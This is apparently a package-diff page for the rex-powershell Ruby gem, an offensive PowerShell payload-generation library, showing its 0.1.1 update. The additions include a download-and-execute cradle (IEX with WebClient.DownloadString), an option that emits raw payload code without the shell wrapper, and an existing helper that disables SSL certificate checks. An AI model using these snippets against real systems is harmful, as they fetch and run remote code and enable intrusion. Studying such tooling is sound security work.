rex-powershell 0.1.0 → 0.1.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (9) hide show
  1. checksums.yaml +4 -4
  2. checksums.yaml.gz.sig +0 -0
  3. data.tar.gz.sig +1 -1
  4. data/lib/rex/powershell/command.rb +29 -2
  5. data/lib/rex/powershell/psh_methods.rb +11 -1
  6. data/lib/rex/powershell/script.rb +1 -0
  7. data/lib/rex/powershell/version.rb +1 -1
  8. metadata +2 -2
  9. metadata.gz.sig +0 -0
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA1:
3
- metadata.gz: 6e804aa77f3457dbd23306effacfe287a50a3c18
4
- data.tar.gz: a270712dba4ac88432abc0755a14ba92b757820b
3
+ metadata.gz: 152b98e69abd262c6e3c3f9a1e5f3f54c5951ee7
4
+ data.tar.gz: 250ae1eebcbf277c2b31c9b8d2479ef66c50a9ca
5
5
  SHA512:
6
- metadata.gz: 874849a04f6e9d63adf92c90c2386aafab036ca6589eefe4a86da82bf8b6fd03c79932bf4e89c65f6b52dd2e2162dfcc3db1fb61b84c02843357a6b0bc6c8483
7
- data.tar.gz: e4643295020c14d26f18d12eb8a3b1ecf436eb41e2f662c5f703875782a4984ae3b3afa9dffa978ea8173226e61d611a85cacc27cdde31af4bc51a5760aa9eb8
6
+ metadata.gz: c7007b550fbf79e2f75060a0cab182b2e5f146c795710ce1785ece6371a3c920b496e5ea09e98fc4ab5e52ec5b6d1417bb7347ff47ee1361bc918a686fb62e71
7
+ data.tar.gz: 95cd36fe4558132a199060562588cc528a1c467939872582b2d0831550b05c8c2cdc6119de3173cb83552264e44e4a13036e17a45bba345d11752050774b52c1
checksums.yaml.gz.sig CHANGED
Binary file
data.tar.gz.sig CHANGED
@@ -1 +1 @@
1
- .ݞ��=��
1
+ EW�x�_�.dz
data/lib/rex/powershell/command.rb CHANGED
@@ -25,6 +25,16 @@ module Command
25
25
  psh.encode_code(eof)
26
26
  end
27
27
 
28
+ #
29
+ # Return the ASCII contents of the base64 encoded script
30
+ #
31
+ # @param script_in [String] Encoded script
32
+ #
33
+ # @return [String] Decoded script
34
+ def self.decode_script(script_in)
35
+ Rex::Powershell::Script.new(script_in).decode_code
36
+ end
37
+
28
38
  #
29
39
  # Return a gzip compressed powershell script
30
40
  # Will invoke PSH modifiers as enabled
@@ -48,6 +58,16 @@ module Command
48
58
  psh.compress_code(eof)
49
59
  end
50
60
 
61
+ #
62
+ # Return the ASCII contents of the GZIP/Deflate compressed script
63
+ #
64
+ # @param script_in [String] Compressed script
65
+ #
66
+ # @return [String] Decompressed script
67
+ def self.decompress_script(script_in)
68
+ Rex::Powershell::Script.new(script_in).decompress_code
69
+ end
70
+
51
71
  #
52
72
  # Generate a powershell command line, options are passed on to
53
73
  # generate_psh_args
@@ -248,6 +268,9 @@ EOS
248
268
  # environment variable at the start of the command line
249
269
  # @option opts [Boolean] :use_single_quotes Wraps the -Command
250
270
  # argument in single quotes unless :encode_final_payload
271
+ # @option opts [TrueClass,FalseClass] :exec_in_place Removes the
272
+ # executable wrappers from the powershell code returning raw PSH
273
+ # for executing with an existing PSH context
251
274
  #
252
275
  # @return [String] Powershell command line with payload
253
276
  def self.cmd_psh_payload(pay, payload_arch, template_path, opts = {})
@@ -340,9 +363,13 @@ EOS
340
363
  command_args[:command] = final_payload
341
364
  end
342
365
 
343
- psh_command = generate_psh_command_line(command_args)
366
+ if opts[:exec_in_place]
367
+ psh_command = "#{command_args[:command]}"
368
+ else
369
+ psh_command = generate_psh_command_line(command_args)
370
+ end
344
371
 
345
- if opts[:remove_comspec]
372
+ if opts[:remove_comspec] or opts[:exec_in_place]
346
373
  command = psh_command
347
374
  else
348
375
  command = "%COMSPEC% /b /c start /b /min #{psh_command}"
data/lib/rex/powershell/psh_methods.rb CHANGED
@@ -70,7 +70,17 @@ module Powershell
70
70
  # @return [String] Powershell code to disable SSL verification
71
71
  # checks.
72
72
  def self.ignore_ssl_certificate
73
- '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
73
+ '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}'
74
+ end
75
+
76
+ #
77
+ # Download and execute string via HTTP
78
+ #
79
+ # @param url [String] string to download
80
+ #
81
+ # @return [String] PowerShell code to download and exec the url
82
+ def self.download_and_exec_string(url)
83
+ %Q^ IEX ((new-object net.webclient).downloadstring('#{url}'))^
74
84
  end
75
85
 
76
86
  #
data/lib/rex/powershell/script.rb CHANGED
@@ -1,5 +1,6 @@
1
1
  # -*- coding: binary -*-
2
2
 
3
+
3
4
  require 'forwardable'
4
5
 
5
6
  module Rex
data/lib/rex/powershell/version.rb CHANGED
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Powershell
3
- VERSION = "0.1.0"
3
+ VERSION = "0.1.1"
4
4
  end
5
5
  end
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-powershell
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.0
4
+ version: 0.1.1
5
5
  platform: ruby
6
6
  authors:
7
7
  - David 'thelightcosine' Maloney
@@ -85,7 +85,7 @@ cert_chain:
85
85
  2SpuQH+SWteq3NXkAmFEEqvLJQ4sbptZt8OP8ghL3pVAvZNFmww/YVszSkShSzcg
86
86
  QdihYCSEL2drS2cFd50jBeq71sxUtxbv82DUa2b+
87
87
  -----END CERTIFICATE-----
88
- date: 2016-06-21 00:00:00.000000000 Z
88
+ date: 2016-07-15 00:00:00.000000000 Z
89
89
  dependencies:
90
90
  - !ruby/object:Gem::Dependency
91
91
  name: bundler
metadata.gz.sig CHANGED
Binary file